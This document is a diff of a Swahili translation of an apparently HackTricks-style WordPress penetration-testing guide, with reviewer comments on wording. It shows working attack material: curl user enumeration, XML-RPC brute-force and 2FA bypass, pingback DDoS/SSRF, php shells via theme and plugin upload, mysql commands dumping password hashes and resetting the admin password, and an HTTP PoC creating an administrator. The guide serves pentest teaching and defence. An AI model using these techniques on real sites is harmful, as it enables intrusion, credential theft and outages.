kwamba kuna zana za otomatiki zinazoshikilia orodha hizi). ### Watumiaji -- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing IDs za watumiaji: +- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing users IDs: ```bash curl -s -I -X GET http://blog.example.com/?author=1 ``` -Ikiwa majibu ni **200** au **30X**, hiyo ina maana kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id si **halali**. +Ikiwa majibu ni **200** au **30X**, hiyo ina maana kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**. 
- **wp-json:** Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza: ```bash curl http://blog.example.com/wp-json/wp/v2/users ``` -Endpoint nyingine ya `/wp-json/` ambayo inaweza kufichua baadhi ya taarifa kuhusu watumiaji ni: +Endpoint mwingine wa `/wp-json/` ambao unaweza kufunua taarifa fulani kuhusu watumiaji ni: ```bash curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL ``` -Kumbuka kuwa endpoint hii inaonyesha tu watumiaji waliofanya chapisho. **Taarifa tu kuhusu watumiaji ambao wamewezeshwa na kipengele hiki ndizo zitatolewa**. +Kumbuka kuwa endpoint hii inaonyesha tu watumiaji waliofanya chapisho. **Taarifa tu kuhusu watumiaji ambao kipengele hiki kimewezeshwa zitatolewa**. -Pia kumbuka kwamba **/wp-json/wp/v2/pages** inaweza leak anwani za IP. +Pia kumbuka kuwa **/wp-json/wp/v2/pages** inaweza leak IP addresses. -- **Login username enumeration**: Unapojaribu kuingia kwenye **`/wp-login.php`**, **ujumbe** ni **tofauti** ikionyesha kama **jina la mtumiaji lipo au halipo**. +- **Login username enumeration**: Unapoingia kwenye **`/wp-login.php`**, ujumbe ni tofauti kulingana na kama username iliyotajwa ipo au la. ### XML-RPC -Ikiwa `xml-rpc.php` iko hai unaweza kufanya credentials brute-force au kuitumia kuanzisha DoS attacks kwa rasilimali nyingine. (Unaweza ku-automate mchakato huu[ using this](https://github.com/relarizky/wpxploit) kwa mfano). +Ikiwa `xml-rpc.php` iko active unaweza kufanya credentials brute-force au kuitumia kuanzisha mashambulizi ya DoS kwa rasilimali nyingine. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example). -To see if it is active try to access to _**/xmlrpc.php**_ and send this request: +Ili kuona kama iko active, jaribu kufikia _**/xmlrpc.php**_ na tuma ombi hili: **Angalia** ```html 
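Review bot: in the @@ -72,44 hunk `-## Uorodhesaji hai` becomes `+## Active enumeration`, reverting that heading to English right after the previous hunk translated "Passive Enumeration" into Swahili; treat the two headings the same way. The plugin/theme paragraph now mixes languages inside one sentence (`**actively Brute Force a list of Plugins and Themes**` in the middle of a Swahili sentence) and changes the meaning of the parenthesis: `kwa bahati nzuri kwetu` ("luckily for us") became `tumaini letu ni kwamba` ("our hope is that"). The XML-RPC paragraph likewise leaves `(You can automate this process[ using this](...) for example)` untranslated. Visible on both the old and the new line: the paragraph calls the file `xml-rpc.php` while the next sentence and the rest of the section use `xmlrpc.php`, which is the real file name; fix it while the line is being rewritten.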
@@ -122,7 +122,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request: **Credentials Bruteforce** -**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kufanya brute-force credentials. Ikiwa unaweza kupata yoyote yao, unaweza kutuma kitu kama: +**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kufanya brute-force kwa credentials. Ikiwa unaweza kupata yoyote yao unaweza kutuma kitu kama: ```html wp.getUsersBlogs @@ -132,13 +132,13 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request: ``` -Ujumbe _"Jina la mtumiaji au nenosiri si sahihi"_ ndani ya response ya code 200 unapaswa kuonekana ikiwa credentials sio halali. +Ujumbe _"Incorrect username or password"_ ndani ya 200 code response unapaswa kuonekana ikiwa credentials hazitakuwa sahihi. ![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>) ![](<../../images/image (721).png>) -Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response njia itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982)) +Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response path itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982)) ```html 
@@ -168,18 +168,18 @@ Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response njia itaon ``` -Pia kuna **njia ya haraka** ya kufanya brute-force ya jina la mtumiaji na nywila kwa kutumia **`system.multicall`**, kwani unaweza kujaribu vigezo vingi kwenye ombi moja: +Pia kuna njia ya haraka zaidi ya brute-force credentials ukitumia **`system.multicall`** kwani unaweza kujaribu credentials kadhaa kwenye ombi moja:
**Bypass 2FA** -Njia hii imelengwa kwa programu, si kwa watu, na ni ya zamani; kwa hiyo haiungi mkono 2FA. Hivyo, ikiwa una creds halali lakini mlango mkuu umehifadhiwa na 2FA, **inawezekana utaweza kutumia xmlrpc.php kuingia kwa kutumia creds hizo ukiepuka 2FA**. Kumbuka hautaweza kutekeleza vitendo vyote unavyoweza kupitia console, lakini bado unaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s) +Njia hii imetengenezwa kwa programs na si za wanadamu, na ni ya zamani, kwa hivyo haitegemei 2FA. Kwa hivyo, ikiwa una valid creds lakini mlango kuu umehifadhiwa kwa 2FA, **unaweza kuabusu xmlrpc.php ku-login kwa kutumia hao creds na kupita 2FA**. Kumbuka kuwa hutaweza kutekeleza vitendo vyote unavyoweza kupitia console, lakini bado unaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s) **DDoS or port scanning** -Ikiwa unaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\ -Hii inaweza kutumika kuagiza **maelfu** za Wordpress **tovuti** **kuingia** eneo moja (hivyo kusababisha **DDoS** katika eneo hilo) au unaweza kuitumia kufanya **Wordpress** ili **scan** baadhi ya mitandao ya ndani (unaweza kubainisha bandari yoyote). +Ikiwa utaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\ +Hii inaweza kutumika kuomba **maelfu** ya Wordpress **sites** ku**access** eneo moja (hivyo kusababisha **DDoS** eneo hilo) au unaweza kuitumia kufanya **Wordpress** i**scan** baadhi ya **internal network** (unaweza kuonyesha port yoyote). ```html pingback.ping 
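Review bot: in the Bypass 2FA paragraph `haiungi mkono 2FA` ("does not support 2FA") became `haitegemei 2FA` ("does not depend on 2FA"), which changes the technical claim: the point of the section is that the XML-RPC interface never implemented 2FA, so valid credentials alone are accepted there; restore the original meaning. The same sentence introduces the anglicism `kuabusu` and leaves `valid creds` in English, whereas the old line had proper Swahili for both (`creds halali` was already the page's term).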
@@ -191,9 +191,9 @@ Hii inaweza kutumika kuagiza **maelfu** za Wordpress **tovuti** **kuingia** eneo ``` ![](../../images/1_JaUYIZF8ZjDGGB7ocsZC-g.png) -Ikiwa unapata **faultCode** yenye thamani **kubwa kuliko** **0** (17), ina maana bandari iko wazi. +Ikiwa unapata **faultCode** yenye thamani **kubwa kuliko** **0** (17), ina maana port iko wazi. -Angalia matumizi ya **`system.multicall`** katika sehemu ya awali ili kujifunza jinsi ya kutumia vibaya njia hii kusababisha DDoS. +Angalia matumizi ya `system.multicall` katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha **DDoS**. **DDoS** ```html 
@@ -209,17 +209,17 @@ Angalia matumizi ya **`system.multicall`** katika sehemu ya awali ili kujifunza ### wp-cron.php DoS -Faili hii kawaida hupatikana chini ya mizizi ya tovuti ya Wordpress: **`/wp-cron.php`**\ -Wakati faili hii inapofikiwa hufanywa MySQL **query** ya **"nzito"**, hivyo inaweza kutumiwa na **attackers** **kusababisha** **DoS**.\ -Pia, kwa chaguo-msingi, `wp-cron.php` huitwa kila inapopakiwa ukurasa (wakati wowote mteja anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS). +Faili hii kawaida huiwepo chini ya root ya Wordpress site: **`/wp-cron.php`**\ +Wakati faili hii ikiwa **accessed** hufanyika "**heavy**" MySQL **query**, hivyo inaweza kutumiwa na **attackers** kusababisha **DoS**.\ +Pia, kwa default, `wp-cron.php` huitwa kila page load (kila mara client anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye maeneo yenye trafiki kubwa linaweza kusababisha matatizo (DoS). -Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya seva itakayotekeleza vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo). +Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host ili ifanye vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo). ### /wp-json/oembed/1.0/proxy - SSRF -Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma ombi kwako. +Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma request kwako. -This is the response when it doesn't work: +Hii ndiyo response inapotakuwa haifanyi kazi: ![](<../../images/image (365).png>) 
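Review bot: the wp-cron paragraph introduces a non-existent verb form, `Faili hii kawaida huiwepo chini ya root`; the old line's `hupatikana chini ya` is correct (or `huwepo`). In the oembed SSRF paragraph `inapotakuwa haifanyi kazi` is likewise not a valid form (`inapokuwa`), and the pre-existing `Worpress` spelling in the prose (`tovuti ya Worpress`) is carried over unchanged on the `+` line; since the sentence is being rewritten anyway, correct it.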
@@ -230,24 +230,24 @@ This is the response when it doesn't work: https://github.com/t0gu/quickpress/blob/master/core/requests.go {{#endref}} -Chombo hiki hukagua kama **methodName: pingback.ping** ipo na kama path **/wp-json/oembed/1.0/proxy** upo; ikiwa zipo, kinajaribu kuzitumia (exploit). +Tool hii inakagua kama **methodName: pingback.ping** ipo na pia path **/wp-json/oembed/1.0/proxy**, na ikiwa zipo, inajaribu kuzi-exploit. -## Zana za Kiotomatiki +## Zana za Otomatiki ```bash cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0" wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs) #You can try to bruteforce the admin user using wpscan with "-U admin" ``` -## Pata ufikiaji kwa kubadilisha biti +## Pata ufikiaji kwa kubadilisha bit -Zaidi ya kuwa shambulio la kweli, hili ni udadisi. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) unaweza kubadilisha biti 1 kutoka kwa faili yoyote ya wordpress. Kwa hivyo unaweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kufanya operesheni ya NOT (`!`) kuwa NOP. +Hii ni zaidi ya udadisi kuliko shambulio halisi. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) ulikuwa unaweza kugeuza 1 bit kutoka kwa faili yoyote ya wordpress. Kwa hivyo ungeweza kugeuza nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kuifanya operesheni ya NOT (`!`) kuwa NOP. ```php if ( ! 
wp_check_password( $password, $user->user_pass, $user->ID ) ) { return new WP_Error( ``` -## **Paneli RCE** +## **RCE ya Paneli** -**Kurekebisha php kutoka kwenye theme inayotumika (inahitaji kredensiali za admin)** +**Kubadilisha faili ya php ya theme inayotumika (inahitaji nyaraka za admin)** Appearance → Theme Editor → 404 Template (kwa upande wa kulia) @@ -255,7 +255,7 @@ Badilisha yaliyomo kwa php shell: ![](<../../images/image (384).png>) -Tafuta mtandaoni jinsi unaweza kufikia ukurasa uliosasishwa. Katika kesi hii, unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) +Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa. Katika kesi hii unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) ### MSF @@ -269,8 +269,8 @@ kupata session. ### PHP plugin -Inawezekana kupakia .php files kama plugin.\ -Tengeneza php backdoor yako kwa mfano: +Inaweza kuwa inawezekana kupakia faili za .php kama plugin.\ +Unda PHP backdoor yako kwa mfano: ![](<../../images/image (183).png>) 
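Review bot: `inahitaji kredensiali za admin` became `inahitaji nyaraka za admin`; `nyaraka` means documents, so the Panel RCE sub-heading now says the technique requires the admin's paperwork instead of admin credentials. Keep `kredensiali` (or `credentials`, which the same hunk uses elsewhere). Also visible in the unchanged `wpscan` context line: `--api-token` is immediately followed by `--passwords`, so the token value was lost at some point and the command as shown will misparse; worth restoring an explicit placeholder in a follow-up.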
@@ -278,82 +278,82 @@ Kisha ongeza plugin mpya: ![](<../../images/image (722).png>) -Pakia plugin na bonyeza Install Now: +Pakia plugin kisha bonyeza Install Now: ![](<../../images/image (249).png>) -Bonyeza Procced: +Bonyeza Proceed: ![](<../../images/image (70).png>) -Inawezekana hili halitaonekana kufanya chochote, lakini ukitembelea Media, utaona shell yako imepakwa: +Huenda hii isifanye chochote kwa dhati, lakini ukienda Media, utaona shell yako imepakiwa: ![](<../../images/image (462).png>) -Ifikie na utaona URL ya kuendesha reverse shell: +Fikia hiyo na utaona URL ya kutekeleza reverse shell: ![](<../../images/image (1006).png>) ### Uploading and activating malicious plugin -Njia hii inahusisha usakinishaji wa plugin yenye madhara inayojulikana kuwa na udhaifu na inaweza kutumika kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo: +Njia hii inahusisha usakinishaji wa malicious plugin inayojulikana kuwa vulnerable na inaweza kutumiwa kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo: -1. **Plugin Acquisition**: Plugin hupatikana kutoka chanzo kama Exploit DB like [**here**](https://www.exploit-db.com/exploits/36374). +1. **Plugin Acquisition**: Plugin hupatikana kutoka kwenye chanzo kama Exploit DB kama [**here**](https://www.exploit-db.com/exploits/36374). 2. **Plugin Installation**: -- Nenda kwenye WordPress dashboard, kisha nenda kwa `Dashboard > Plugins > Upload Plugin`. -- Pakia faili la zip la plugin ulilopakua. -3. **Plugin Activation**: Mara plugin itakapowekwa kwa mafanikio, lazima iwe imewezeshwa kupitia dashboard. +- Navigate to the WordPress dashboard, then go to `Dashboard > Plugins > Upload Plugin`. +- Upload the zip file of the downloaded plugin. +3. **Plugin Activation**: Mara plugin inapowekwa kwa mafanikio, lazima iamishwe kupitia dashboard. 4. **Exploitation**: -- Ukiwa na plugin "reflex-gallery" imewekwa na imewezeshwa, inaweza kutumika kwani inajulikana kuwa na udhaifu. 
-- Metasploit framework inatoa exploit kwa udhaifu huu. Kwa kupakia module inayofaa na kutekeleza amri maalum, meterpreter session inaweza kuanzishwa, ikitoa ufikiaji usioidhinishwa kwenye tovuti. -- Imetajwa kwamba hii ni mojawapo ya njia nyingi za kutumia udhaifu wa tovuti ya WordPress. +- With the plugin "reflex-gallery" installed and activated, it can be exploited as it is known to be vulnerable. +- The Metasploit framework provides an exploit for this vulnerability. By loading the appropriate module and executing specific commands, a meterpreter session can be established, granting unauthorized access to the site. +- It's noted that this is just one of the many methods to exploit a WordPress site. -Yaliyomo yanajumuisha picha zinazoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na haifai bila idhini sahihi. Taarifa hizi zinapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama penetration testing na idhini wazi. +Yaliyomo yanajumuisha msaada wa kuona unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kuelewa kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na si ya maadili bila idhini stahiki. Taarifa hizi zitumike kwa uwajibikaji na tu katika muktadha halali, kama pentesting kwa idhini dhahiri. **For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/) -## From XSS to RCE +## Kutoka XSS hadi RCE -- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua uvujaji wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au udhaifu mwingine mzito katika WordPress. Kwa habari zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). 
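Review bot: the plugin-installation steps are reverted from Swahili to English (`-- Nenda kwenye WordPress dashboard, kisha nenda kwa ...` becomes `+- Navigate to the WordPress dashboard, then go to ...`, and the three "Exploitation" bullets likewise), while the surrounding numbered items and the paragraph about responsible use stay in Swahili; the procedure now switches language between steps. Keep the Swahili lines and apply only the wording fixes. The `Procced` → `Proceed` and `imepakwa` → `imepakiwa` corrections in the same region are good.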
Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:** -- _**Privilege Escalation:**_ Huunda mtumiaji ndani ya WordPress. -- _**(RCE) Custom Plugin (backdoor) Upload:**_ Pakia custom plugin yako (backdoor) kwenye WordPress. -- _**(RCE) Built-In Plugin Edit:**_ Hariri Built-In Plugins katika WordPress. -- _**(RCE) Built-In Theme Edit:**_ Hariri Built-In Themes katika WordPress. -- _**(Custom) Custom Exploits:**_ Custom Exploits kwa Third-Party WordPress Plugins/Themes. +- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kukuza **Cross-Site Scripting (XSS)** vulnerability hadi **Remote Code Execution (RCE)** au vunja usalama mwingine hatari katika WordPress. Kwa habari zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa msaada kwa WordPress Versions 6.X.X, 5.X.X na 4.X.X na inaruhusu: +- _**Privilege Escalation:**_ Creates an user in WordPress. +- _**(RCE) Custom Plugin (backdoor) Upload:**_ Upload your custom plugin (backdoor) to WordPress. +- _**(RCE) Built-In Plugin Edit:**_ Edit a Built-In Plugins in WordPress. +- _**(RCE) Built-In Theme Edit:**_ Edit a Built-In Themes in WordPress. +- _**(Custom) Custom Exploits:**_ Custom Exploits for Third-Party WordPress Plugins/Themes. ## Post Exploitation -Chukua majina ya watumiaji na nywila: +Chota usernames na passwords: ```bash mysql -u --password= -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;" ``` -Badilisha admin password: +Badilisha password ya admin: ```bash mysql -u --password= -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;" ``` ## Wordpress Plugins Pentest -### Uso wa Mashambulizi +### Attack Surface -Kujua jinsi plugin ya Wordpress inaweza kuweka wazi utendakazi ni muhimu ili kupata udhaifu katika utendakazi wake. 
Unaweza kuona jinsi plugin inaweza kuweka wazi utendakazi katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo na udhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/). +Kujua jinsi Wordpress plugin inavyoweza kufichua functionality ni muhimu ili kupata vulnerabilities kwenye functionality yake. Unaweza kuona jinsi plugin inaweza kufichua functionality katika pointi zifuatazo na baadhi ya mifano ya vulnerable plugins katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/). - **`wp_ajax`** -Moja ya njia plugin inaweza kufichua functions kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na bugs za logic, authorization, au authentication. Aidha, mara nyingi functions hizi zitategemea authentication na authorization kwa kuwepo kwa wordpress nonce ambayo **mtumiaji yeyote aliye-authenticated kwenye instance ya Wordpress anaweza kuwa nayo** (hata bila kuzingatia jukumu lake). +Mojawapo ya njia plugin inaweza kufichua functions kwa users ni kupitia AJAX handlers. Hizi zinaweza kuwa na logic, authorization, au authentication bugs. Zaidi ya hayo, mara nyingi hizi functions zitategemea authentication na authorization kwa kuwepo kwa Wordpress nonce ambayo **any user authenticated in the Wordpress instance might have** (independently of its role). Hizi ni functions ambazo zinaweza kutumika kufichua function katika plugin: ```php add_action( 'wp_ajax_action_name', array(&$this, 'function_name')); add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name')); ``` -**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wasiothibitishwa).** +**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasio na uthibitisho).** > [!CAUTION] -> Zaidi ya hayo, ikiwa function inachunguza tu idhini ya mtumiaji kwa kutumia `wp_verify_nonce`, function hii inabaini tu kwamba mtumiaji ameingia; kwa kawaida haitambui jukumu la mtumiaji. 
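Review bot: the WPXStrike capability list is reverted to English and picks up new grammar errors on the way (`Creates an user in WordPress`, `Edit a Built-In Plugins in WordPress`, `Edit a Built-In Themes in WordPress`): it should read "a user", and either "a Built-In Plugin" or "Built-In Plugins". The `-### Uso wa Mashambulizi` heading likewise becomes `+### Attack Surface`, and the `wp_ajax` paragraph now ends in an English bold fragment `**any user authenticated in the Wordpress instance might have** (independently of its role)` inside a Swahili sentence; the old lines had consistent Swahili for all three.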
Kwa hivyo watumiaji wenye ruhusa ndogo wanaweza kufanya vitendo vinavyohitaji ruhusa za juu. +> Zaidi ya hayo, ikiwa function inachunguza idhini ya mtumiaji kwa kutumia function `wp_verify_nonce`, function hii inabaini tu kwamba mtumiaji ameingia, na kawaida haiangalii cheo la mtumiaji. Kwa hivyo watumiaji wenye ruhusa ndogo wanaweza kupata ufikiaji wa vitendo vyenye ruhusa kubwa. - **REST API** -Pia inawezekana kufunua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`: +Inawezekana pia kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`: ```php register_rest_route( $this->namespace, '/get/', array( 
@@ -363,21 +363,21 @@ $this->namespace, '/get/', array( ) ); ``` -The `permission_callback` ni callback kwa function inayothibitisha ikiwa mtumiaji fulani ameidhinishwa kuita API method. +The `permission_callback` ni callback ya kazi inayokagua ikiwa mtumiaji aliyotajwa ameidhinishwa kuita njia ya API. -**Ikiwa function iliyojengwa ndani `__return_true` itatumika, itapita tu ukaguzi wa ruhusa za mtumiaji.** +**Ikiwa kazi ya ndani ya kujengwa `__return_true` itatumiwa, itapita tu ukaguzi wa ruhusa za mtumiaji.** -- **Ufikiaji wa moja kwa moja wa faili ya php** +- **Ufikiaji wa moja kwa moja wa faili la php** -Kama kawaida, Wordpress inatumia PHP na faili ndani ya plugin zinaweza kupatikana moja kwa moja kupitia wavuti. Kwa hivyo, ikiwa plugin inafichua utendaji wenye udhaifu unaozinduliwa kwa kuingia tu kwenye faili, mtumiaji yeyote ataweza kuutumia. +Hakika, Wordpress inatumia PHP na faili ndani ya plugins zinaweza kupatikana moja kwa moja kutoka kwenye wavuti. Hivyo, endapo plugin inaonyesha utendaji wenye udhaifu unaochochewa tu kwa kufungua faili hilo, utakuwa rahisi kutumiwa na mtumiaji yeyote. ### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1) -Baadhi ya plugins zinafanya “trusted header” shortcuts kwa ajili ya internal integrations au reverse proxies na kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa maombi ya REST. Ikiwa header haitafungwi cryptographically na sehemu ya juu (upstream component), mshambuliaji anaweza kuiga (spoof) na kufikia routes za REST zenye ruhusa kama administrator. +Baadhi ya plugins hutekeleza “trusted header” njia za mkato kwa integrasiyo za ndani au reverse proxies kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa maombi ya REST. Ikiwa header haifungwi kwa njia ya kriptografia kwenye ombi na sehemu ya juu, mshambuliaji anaweza kuifanya spoof na kufikia routes za REST zenye marufuku kama administrator. 
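Review bot: in the trusted-header section `routes za REST zenye ruhusa` (privileged REST routes) became `routes za REST zenye marufuku` (forbidden REST routes), which inverts the meaning: the spoofed header reaches routes that require elevated privileges, not routes that are banned. The `permission_callback` sentence keeps an English `The` at the start of a Swahili sentence on both the old and the new line, and `kazi ya ndani ya kujengwa` is an awkward rendering of "built-in function" where the old `function iliyojengwa ndani` read fine. Minor, in the caution box: `cheo la mtumiaji` should agree as `cheo cha mtumiaji`.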
-- Athari: kuinuka kwa mamlaka bila uthibitisho hadi admin kwa kuunda msimamizi mpya kupitia core users REST route. -- Example header: `X-Wcpay-Platform-Checkout-User: 1` (inafanya user ID 1, kawaida akaunti ya msimamizi wa kwanza). -- Exploited route: `POST /wp-json/wp/v2/users` kwa role array yenye ruhusa za juu. +- Athari: kuinuka kwa ruhusa bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route. +- Mfano wa header: `X-Wcpay-Platform-Checkout-User: 1` (lazimisha user ID 1, kawaida akaunti ya kwanza ya administrator). +- Njia iliyotumiwa: `POST /wp-json/wp/v2/users` na array ya role iliyoongezwa. PoC ```http 
@@ -391,31 +391,31 @@ Content-Length: 114 {"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]} ``` -Kwa nini inafanya kazi +Why it works -- Plugin inaweka header inayodhibitiwa na mteja kwenye authentication state na inaruka capability checks. -- WordPress core inatarajia `create_users` capability kwa route hii; hack ya plugin inaitikisa kwa kuweka moja kwa moja current user context kutoka kwenye header. +- Plugin inamepanga header inayodhibitiwa na mteja kwenye hali ya uthibitisho na inapuuza ukaguzi wa capability. +- Msingi wa WordPress unatarajia `create_users` capability kwa route hii; hack ya plugin inalipa kizuizi hicho kwa kuweka moja kwa moja muktadha wa mtumiaji wa sasa kutoka kwa header. -Viashiria vya mafanikio vinavyotarajiwa +Expected success indicators -- HTTP 201 na mwili wa JSON unaelezea user iliyoundwa. -- Mtumiaji mpya wa admin unaoonekana katika `wp-admin/users.php`. +- HTTP 201 with a JSON body describing the created user. +- Mtumiaji mpya wa admin anaonekana katika `wp-admin/users.php`. -Orodha ya kugundua +Detection checklist -- Tumia grep kutafuta `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosasisha custom headers kuweka user context (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`). -- Pitia REST registrations kwa privileged callbacks ambazo hazina ukaguzi imara wa `permission_callback` na badala yake zinategemea request headers. -- Tazama matumizi ya core user-management functions (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zinalindwa tu kwa thamani za header. +- Grep for `getallheaders()`, `$_SERVER['HTTP_...']`, or vendor SDKs that read custom headers to set user context (e.g., `wp_set_current_user()`, `wp_set_auth_cookie()`). +- Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers. 
+- Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values. -### Kuondolewa kwa faili bila uthibitisho kupitia wp_ajax_nopriv (Litho Theme <= 3.0) +### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0) -Themes na plugins za WordPress mara nyingi hutoa AJAX handlers kupitia hooks `wp_ajax_` na `wp_ajax_nopriv_`. Wakati toleo la **_nopriv_** linapotumiwa **callback inakuwa inafikiwa na wageni wasioingia**, kwa hivyo kitendo chochote nyeti kinapaswa pia kutekeleza: +Mandhari na plugins za WordPress mara nyingi huweka wazi AJAX handlers kupitia hooks `wp_ajax_` na `wp_ajax_nopriv_`. Wakati toleo **_nopriv_** linapotumika **callback inakuwa inafikiwa na wageni wasio na uthibitisho**, kwa hivyo kitendo chochote nyeti kinapaswa pia kutekelezwa: -1. Ukaguzi wa **capability** (mf. `current_user_can()` au angalau `is_user_logged_in()`), na -2. **CSRF nonce** iliyoathibitishwa na `check_ajax_referer()` / `wp_verify_nonce()`, na -3. **Usafishaji / uthibitishaji mkali wa input**. +1. Ukaguzi wa **capability** (mfano `current_user_can()` au angalau `is_user_logged_in()`), na +2. CSRF nonce iliyothibitishwa kwa `check_ajax_referer()` / `wp_verify_nonce()`, na +3. **Uchujaji / uthibitishaji madhubuti wa ingizo**. -The Litho multipurpose theme (< 3.1) ilisahau udhibiti hizo 3 katika kipengele cha *Remove Font Family* na mwishowe ikatuma msimbo ufuatao (umepunguzwa): +Mandhari ya Litho multipurpose (< 3.1) ilisahau udhibiti hizo 3 katika kipengele cha *Remove Font Family* na hatimaye ilitoa code ifuatayo (imefupishwa): ```php function litho_remove_font_family_action_data() { if ( empty( $_POST['fontfamily'] ) ) { 
